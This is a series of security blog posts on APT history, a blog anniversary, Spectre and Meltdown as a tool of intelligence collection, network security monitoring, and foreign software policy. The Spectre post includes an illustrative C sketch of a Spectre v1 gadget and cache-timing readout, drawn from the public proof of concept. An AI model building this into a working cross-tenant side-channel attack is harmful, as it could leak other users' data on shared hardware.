Sunday, January 14, 2018

Remembering When APT Became Public

Last week I Tweeted the following on the 8th anniversary of Google's blog post about its compromise by Chinese threat actors:

This intrusion made the term APT mainstream. I was the first to associate it with Aurora, in this post 

https://taosecurity.blogspot.com/2010/01/google-v-china.html

My first APT post was a careful reference in 2007, when we all feared being accused of "leaking classified" re China: 

https://taosecurity.blogspot.com/2007/10/air-force-cyberspace-report.html

I should have added the term "publicly" to my original Tweet. There were consultants with years of APT experience involved in the Google incident response, and they recognized the work of APT17 at that company and others. Those consultants honored their NDAs and have stayed quiet.

I wrote my original Tweet as a reminder that "APT" was not a popular, recognized term until the Google announcement on 12 January 2010. In my Google v China blog post I wrote:

Welcome to the party, Google. You can use the term "advanced persistent threat" (APT) if you want to give this adversary its proper name.

I also Tweeted a similar statement on the same day:

This is horrifying: http://bit.ly/7x7vVW Google admits intellectual property theft from China; it's called Advanced Persistent Threat, GOOG

I made the explicit link between China and APT because no one had done that publicly.

This slide from a 2011 briefing I did in Hawaii captures a few historical points:


The Google incident was a watershed, for reasons I blogged on 16 January 2010. I remember the SANS DFIR 2008 event as effectively "APTCon," but beyond Mandiant, Northrop Grumman, and NetWitness, no one was really talking publicly about the APT until after Google.

As I noted in the July 2009 blog post, You Down With APT? (ugh):

Aside from Northrup Grumman, Mandiant, and a few vendors (like NetWitness, one of the full capture vendors out there) mentioning APT, there's not much else available. A Google search for "advanced persistent threat" -netwitness -mandiant -Northrop yields 34 results (prior to this blog post). (emphasis added)

Today that search yields 244,000 results.

I would argue we're "past APT." APT was the buzzword for RSA and other vendor-centric events from, say, 2011-2015, with 2013 being the peak following Mandiant's APT1 report.

The threat hasn't disappeared, but it has changed. I wrote my Tweet to mark a milestone and to note that I played a small part in it.

All my APT posts here are reachable by this APT tag. Also see my 2010 article for Information Security Magazine titled What APT Is, and What It Isn't.

Monday, January 08, 2018

Happy 15th Birthday TaoSecurity Blog

Today, 8 January 2018, is the 15th birthday of TaoSecurity Blog! This is also my 3,020th blog post.

I wrote my first post on 8 January 2003 while working as an incident response consultant for Foundstone.

I don't believe I've released statistics for the blog before, so here are a few. Blogger started providing statistics in May 2010, so these apply to roughly the past 8 years only!

As of today, the blog has recorded nearly 7.7 million page views since May 2010.

Here are the most popular posts as of today:


Twitter continues to play a role in the way I communicate. When I last reported on a blog birthday two years ago, I said that I had nearly 36,000 Twitter followers for @taosecurity, with roughly 16,000 Tweets. Today I have nearly 49,000 followers with fewer than 18,000 Tweets. As with most people on social media, blogging has taken a back seat to more instant forms of communication.

These days I am active on Instagram as @taosecurity as well. That account is a departure from my social media practice. On Twitter I have separate accounts for cybersecurity and intelligence (@taosecurity), martial arts (@rejoiningthetao), and other purposes. My Instagram @taosecurity account is a unified account, meaning I talk about whatever I feel like. 

During the last two years I also started another blog to which I regularly contribute -- Rejoining the Tao. I write about my martial arts journey there, usually once a week.

Once in a while I post to LinkedIn, but it's usually news of a blog post like this, or other LinkedIn content of interest.

What's ahead? You may remember I was working on a PhD and I had left FireEye. I decided to abandon my PhD in the fall of 2016. I realized I was not an academic, although I had written four books.

I have also changed all the goals I named in my post-FireEye announcement.

For the last year I have been doing limited security consulting, but that has been increasing in recent months. I continue to be involved in martial arts, but I no longer plan to be a Krav Maga instructor nor to open my own school.

For several months I've been working with a co-author and subject matter expert on a new book with martial arts applicability. I've been responsible for editing and publishing. I'll say more about that at Rejoining the Tao when the time is right.

Thank you to everyone who has been part of this blog's journey since 2003!

Friday, January 05, 2018

Spectre and Meltdown from a CNO Perspective

Longtime readers know that I have no problem with foreign countries replacing American vendors with local alternatives. For example, see Five Reasons I Want China Running Its Own Software. This is not a universal principle, but as an American I am fine with it. Putting my computer network operations (CNO) hat on, I want to share a few thoughts about the intersection of the anti-American vendor mindset with the recent Spectre and Meltdown attacks.

There are probably non-Americans who, for a variety of reasons, feel that it would be "safer" for them to run their cloud computing workloads on non-American infrastructure. Perhaps they feel that it puts their data beyond the reach of the American Department of Justice. (I personally feel that it's an over-reach by DoJ to try to access data beyond American borders, e.g., Microsoft Corp. v. United States.)

The American intelligence community and computer network operators, however, might prefer to have that data outside American borders. These agencies are still bound by American laws, but those laws generally permit exploitation overseas.

Now put this situation in the context of Spectre and Meltdown. Begin with the attack scenario mentioned by Nicole Perlroth, where an attacker rents a few minutes of time on various cloud systems, then leverages Spectre and/or Meltdown to try to gather sensitive data from other virtual machines on the same physical hardware.
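For readers who want to see what "leveraging Spectre" actually looks like, below is a minimal C sketch of the bounds-check-bypass gadget at the heart of Spectre variant 1, condensed from the public Kocher et al. proof of concept. It is illustrative only: a real cross-tenant attack also requires co-residency on the same physical hardware, repeated branch predictor training, and many measurement passes. The array names, sizes, and the "secret" string are my own placeholders, not anyone's actual code.

/* Sketch of a Spectre v1 "bounds check bypass" gadget plus a
   flush-and-measure readout. Condensed from the public Kocher et al.
   PoC; it will not reliably leak without the training loop a real
   exploit uses. x86 only; build with: gcc -O1 spectre_sketch.c */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <x86intrin.h>            /* _mm_clflush, __rdtscp */

uint8_t array1[16];
size_t  array1_size = 16;
uint8_t probe[256 * 512];          /* one cache line per byte value */
const char *secret = "hypothetical other-tenant data";

/* Victim: under misspeculation the CPU may run the body even when x
   is out of bounds, leaving array1[x]'s value visible in cache state. */
void victim(size_t x) {
    if (x < array1_size) {
        volatile uint8_t t = probe[array1[x] * 512];
        (void)t;
    }
}

/* Attacker: flush the probe array, invoke the victim with an
   out-of-bounds index, then time loads to find the warmed line.
   (A real PoC visits the lines in a mixed order to defeat the
   hardware prefetcher.) */
int guess_byte(size_t malicious_x) {
    int best = -1;
    uint64_t best_time = (uint64_t)-1;
    unsigned aux;
    for (int i = 0; i < 256; i++)
        _mm_clflush(&probe[i * 512]);
    victim(malicious_x);           /* real PoC: train in-bounds first */
    for (int i = 0; i < 256; i++) {
        uint64_t t0 = __rdtscp(&aux);
        volatile uint8_t t = probe[i * 512];
        (void)t;
        uint64_t dt = __rdtscp(&aux) - t0;
        if (dt < best_time) { best_time = dt; best = i; }
    }
    return best;                   /* fastest load hints at the secret byte */
}

int main(void) {
    /* Index chosen so array1 + x points into "secret". */
    size_t x = (size_t)(secret - (const char *)array1);
    printf("guessed byte value: %d\n", guess_byte(x));
    return 0;
}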

No lawyer or judge would allow this sort of attack scenario if it were performed on American systems. It would be very difficult, I think, to minimize data in this kind of "fishing expedition." Most of the data returned would belong to US persons and would be subject to protection. Sure, there are conspiracy theorists out there who will never trust that the US government follows its own laws. These people are sure that the USG already knew about Spectre and Meltdown and has ravaged every American cloud system, after doing the same with the "Intel Management Engine backdoors."

In reality, US law will prevent computer network operators from running these sorts of missions on US cloud infrastructure. Overseas, it's a different story. Non-US persons do not enjoy the same sorts of privacy protections as US persons. Therefore, the more "domestic" (non-American) the foreign target, the better. For example, if the IC identified a purely Russian cloud provider, it would not be difficult for the USG to authorize a Spectre-Meltdown collection operation against that target.

I have no idea if this is happening, but it was one of my first thoughts when I heard about this new attack vector.

Bonus: it's popular to criticize academics who research cybersecurity, on the grounds that they don't seem to find much that is interesting or relevant. However, academics played a big role in discovering Spectre and Meltdown. Wow!

Monday, December 04, 2017

On "Advanced" Network Security Monitoring

My TaoSecurity News page says I taught 41 classes lasting a day or more, from 2002 to 2014. All of these involved some aspect of network security monitoring (NSM). Many times students would ask me when I would create the "advanced" version of the class, usually in the course feedback. I could never answer them, so I decided to do so in this blog post.

The short answer is this: at some point, advanced NSM is no longer NSM. If you consider my collection - analysis - escalation - response model, extensions of any of those phases quickly have little or nothing to do with the network.

Here are a few questions I have received concerning "advanced NSM," paired with the answers I could have provided.

Q: "I used NSM to extract a binary from network traffic. What do I do with this binary?"

A: "Learn about reverse engineering and binary analysis."

Or:

Q: "I used NSM to extra Javascript from a malicious Web page. What do I do with this Javascript?"

A: "Learn about Javascript de-obfuscation and programming."

Or:

Q: "I used NSM to capture an exchange between a Windows client and a server. What does it mean?"

A: "Learn about Server Message Block (SMB) or Common Internet File System (CIFS)."

Or:

Q: "I used NSM to capture cryptographic material exchanged between a client and a server. How do I understand it?"

A: "Learn about cryptography."

Or:

Q: "I used NSM to grab shell code passed with an exploit against an Internet-exposed service. How do I tell what it does?"

A: "Learn about programming in assembly."

Or:

Q: "I want to design custom hardware for packet capture. How do I do that?"

A: "Learn about programming ASICs (application specific integrated circuits)."

I realized that I had the components of all of this "advanced NSM" material in my library. I had books on reverse engineering and binary analysis, JavaScript, SMB/CIFS, cryptography, assembly programming, ASICs, etc.

The point is that eventually the NSM road takes you to other aspects of the cyber security landscape.

Are there *any* advanced areas for NSM? One could argue that protocol analysis, as found in tools like Bro, Suricata, Snort, and Wireshark, constitutes advanced NSM. However, you could just as easily argue that protocol analysis becomes more about understanding the programming and standards behind each of the protocols.
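For a taste of what those tools do under the hood, here is a minimal C sketch, assuming you have raw packet bytes in hand, that decodes the fixed portion of an IPv4 header per RFC 791. The sample bytes are fabricated for illustration (the checksum is left zero for brevity).

/* Decode the fixed 20-byte portion of an IPv4 header from raw bytes. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

void decode_ipv4(const uint8_t *p, size_t len) {
    if (len < 20) {                        /* minimum IPv4 header size */
        fprintf(stderr, "truncated header\n");
        return;
    }
    int version   = p[0] >> 4;             /* should be 4 */
    int ihl_bytes = (p[0] & 0x0F) * 4;     /* header length in bytes */
    int total_len = (p[2] << 8) | p[3];    /* big-endian on the wire */
    int ttl       = p[8];
    int protocol  = p[9];                  /* 6 = TCP, 17 = UDP */
    printf("IPv%d ihl=%d total=%d ttl=%d proto=%d %d.%d.%d.%d -> %d.%d.%d.%d\n",
           version, ihl_bytes, total_len, ttl, protocol,
           p[12], p[13], p[14], p[15], p[16], p[17], p[18], p[19]);
}

int main(void) {
    /* Fabricated sample: IPv4, TCP, TTL 64, 10.0.0.1 -> 10.0.0.2,
       checksum left zero for brevity. */
    const uint8_t pkt[20] = {
        0x45, 0x00, 0x00, 0x28, 0x00, 0x00, 0x40, 0x00,
        0x40, 0x06, 0x00, 0x00, 10, 0, 0, 1, 10, 0, 0, 2
    };
    decode_ipv4(pkt, sizeof pkt);
    return 0;
}

Even this toy decoder forces you to consult the RFC for field widths and byte order, which supports the argument: the "advanced" work is really about the standards and the programming, not the monitoring.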

In brief, to learn advanced NSM, expand beyond NSM.

Saturday, October 21, 2017

How to Minimize Leaking

I am hopeful that President Trump will not block release of the remaining classified documents addressing the 1963 assassination of President John F. Kennedy. I grew up a Roman Catholic in Massachusetts, so President Kennedy always fascinated me.

The 1991 Oliver Stone movie JFK fueled several years of hobbyist research into the assassination. (It's unfortunate the movie was so loaded with fictional content!) On the 30th anniversary of JFK's death in 1993, I led a moment of silence from the balcony of the Air Force Academy chow hall during noon meal. While stationed at Goodfellow AFB in Texas, Mrs B and I visited Dealey Plaza in Dallas and the Sixth Floor Museum.

Many years later, thanks to a 1992 law partially inspired by the Stone movie, the government has a chance to release the last classified assassination records. As a historian and former member of the intelligence community, I hope all of the documents become public. This would be a small but significant step towards minimizing the culture of information leaking in Washington, DC. If prospective leakers were part of a system that was known for releasing classified information prudently, regularly, and efficiently, it would decrease the leakers' motivation to evade the formal declassification process.

Many smart people have recommended improvements to the classification system. Check out this 2012 report for details.

Monday, May 08, 2017

Latest Book Inducted into Cybersecurity Canon

Thursday evening Mrs B and I were pleased to attend an awards seminar for the Cybersecurity Canon. This is a project sponsored by Palo Alto Networks and led by Rick Howard. The goal is to "identify a list of must-read books for all cybersecurity practitioners."

Rick reviewed my fourth book The Practice of Network Security Monitoring in 2014, and someone nominated it for consideration in 2016. I was unaware earlier this year that my book was part of a 32-title "March Madness" style competition. My book won its five rounds, resulting in its inclusion on the 2017 inductee list! Thank you to all those who voted for my book.

Ben Rothke awarded me the Canon trophy.

Ben Rothke interviewed me prior to the induction ceremony. We discussed some current trends in security and some lessons from the book. I hope to see that interview published by Palo Alto Networks and/or the Cybersecurity Canon project in the near future.

In my acceptance speech I explained how I wrote the book because I had not yet dedicated a book to my youngest daughter, since she was born after my third book was published.

A teaching moment at Black Hat Abu Dhabi in December 2012 inspired me to write the book. While teaching network security monitoring, one of the students asked "but where do I install the .exe on the server?"

I realized this student had no concept of physical access to a wire, of using a system to collect and store network traffic, or of any of the other fundamentals inherent to NSM. He thought NSM was another magical software package to install on his domain controller.

Four foreign language editions.

Thanks to the interpretation assistance of a local Arabic speaker, I was able to get through to him. However, the experience convinced me that I needed to write a new book that built NSM from the ground up, hence the selection of topics and the order in which I presented them.

While my book has not (yet?) been translated into Arabic, there are two Chinese language editions, a Korean edition, and a Polish edition! I also know of several SOCs that provide a copy of the book to all incoming analysts. The book is also a text in several college courses.

I believe the book remains relevant for anyone who wants to learn the NSM methodology to detect and respond to intrusions. While network traffic is the example data source used in the book, the NSM methodology is data source agnostic.

In 2002 Bamm Visscher and I defined NSM as "the collection, analysis, and escalation of indications and warnings to detect and respond to intrusions." This definition makes no reference to network traffic.

It is the collection-analysis-escalation framework that matters. You could perform NSM using log files, or host-centric data, or whatever else you use for indications and warning.

I have no plans for another cybersecurity book. I am currently editing a book about combat mindset written by the head instructor of my Krav Maga style and his colleague.

Thanks for asking for an autograph!

Palo Alto Networks hosted a book signing and offered free books for attendees. I got a chance to speak with Steven Levy, whose book Hackers was also inducted. I sat next to him during the book signing, as shown in the picture at right.

Thank you to Palo Alto Networks, Rick Howard, Ben Rothke, and my family for making inclusion in the Cybersecurity Canon possible. The awards dinner was a top-notch event. Mrs B and I enjoyed meeting a variety of people, including students in local cybersecurity degree programs.

I closed my acceptance speech with the following from the end of the Old Testament, at the very end of 2nd Maccabees. It captures my goal when writing books:

"So I too will here end my story. If it is well told and to the point, that is what I myself desired; if it is poorly done and mediocre, that was the best I could do."

If you'd like a copy of The Practice of Network Security Monitoring the best deal is to buy print and electronic editions from the publisher's Web site. Use code NSM101 to save 30%. I like having the print version for easy review, and I carry the digital copy on my tablet and phone.

Thank you to everyone who voted and who also bought a copy of my book!

Update: I forgot to thank Doug Burks, who created Security Onion, the software used to demonstrate NSM in the book. Doug also contributed the appendix explaining certain SO commands. Thank you Doug! Also thank you to Bill Pollack and his team at No Starch Press, who edited and published the book!

Thursday, March 23, 2017

Five Reasons I Want China Running Its Own Software

Periodically I read about efforts by China, or Russia, or North Korea, or other countries to replace American software with indigenous or semi-indigenous alternatives. I then reply via Twitter that I love the idea, with a short reason why. This post will list the top five reasons why I want China and other likely targets of American foreign intelligence collection to run their own software.

1. Many (most?) non-US software companies write lousy code. The US is by no means perfect, but our developers and processes generally appear to be superior to foreign indigenous efforts. Cisco vs Huawei is a good example. Cisco has plenty of problems, but it has processes in place to manage them, plus secure code development practices. Lousy indigenous code means it is easier for American intelligence agencies to penetrate foreign targets. (An example of a foreign country that excels in writing code is Israel, but thankfully it is not the same sort of priority target as China, Russia, or North Korea.)

2. Many (most?) non-US enterprises are 5-10 years behind US security practices. Even if a foreign target runs decent native code, the IT processes maintaining that code are lagging compared to American counterparts. Again, the US has not solved this problem by any stretch of the imagination. However, relatively speaking, American inventory management, patch management, and security operations have the edge over foreign intelligence targets. Because non-US enterprises running indigenous code will not necessarily be able to benefit from American expertise (as they might if they were running American code), these deficiencies will make them easier targets for foreign exploitation.

3. Foreign targets running foreign code is win-win for American intel and enterprises. The current vulnerability equities process (VEP) puts American intelligence agencies in a quandary. The IC develops a zero-day exploit for a vulnerability, say for use against Cisco routers. American and Chinese organizations use Cisco routers. Should the IC sit on the vulnerability in order to maintain access to foreign targets, or should it release the vulnerability to Cisco to enable patching and thereby protect American and foreign systems?

This dilemma disappears in a world where foreign targets run indigenous software. If the IC identifies a vulnerability in Cisco software, and the majority of its targets run non-Cisco software, then the IC is more likely (or should be pushed to be more likely) to assist with patching the vulnerable software. Meanwhile, the IC continues to exploit Huawei or other products at its leisure.

4. Writing and running indigenous code is the fastest way to improve. When foreign countries essentially outsource their IT to vendors, they become program managers. They lose or never develop any ability to write and run quality software. Writing and running your own code will enroll foreign organizations in the security school of hard knocks. American intel will have a field day for 3-5 years against these targets, as they flail around in a perpetual state of compromise. However, if they devote the proper native resources and attention, they will learn from their mistakes. They will write and run better software. Now, this means they will become harder targets for American intel, but American intel will retain the advantage of point 3.

5. Trustworthy indigenous code will promote international stability. Countries like China feel especially vulnerable to American exploitation. They have every reason to be scared. They run code written by other organizations. They don't patch it or manage it well. Their security operations stink. The American intel community could initiate a complete moratorium on hacking China, and the Chinese would still be ravaged by other countries or criminal hackers, all the while likely blaming American intel. They would not be able to assess the situation. This makes for a very unstable situation.

Therefore, countries like China and others are going down the indigenous software path. They understand that software, not oil (as Daniel Yergin once wrote), is now the "commanding heights" of the economy. Pursuing this course will subject these countries to many years of pain. However, in the end I believe it will yield a more stable situation. These countries should begin to perceive that they are less vulnerable. They will experience their own vulnerability equities process. They will be more aware and less paranoid.

In this respect, indigenous software is a win for global politics. The losers, of course, are global software companies. Foreign countries will continue to make short-term deals to suck intellectual property and expertise from American software companies, before discarding them on the side of Al Gore's information highway.

One final point -- a way foreign companies could jump-start their indigenous efforts would be to leverage open source software. I doubt they would necessarily honor licenses which require sharing improvements with the open source community. However, open source would give foreign organizations the visibility they need and access to expertise that they lack. Microsoft's shared source and similar programs were a step in this direction, but I suggest foreign organizations adopt open source instead.

Now, widespread open source adoption by foreign intelligence targets would erode the advantages for American intel that I explained in point 3. I'm betting that foreign leaders are similar to Americans in that they tend not to trust open source, and prefer to roll their own and hold vendors accountable. Therefore I'm not that worried, from an American intel perspective, about point 3 being vastly eroded by widespread foreign open source adoption.

TeePublic is running a sale until midnight ET Thursday! Get a TaoSecurity Milnet T-shirt for yourself and a friend!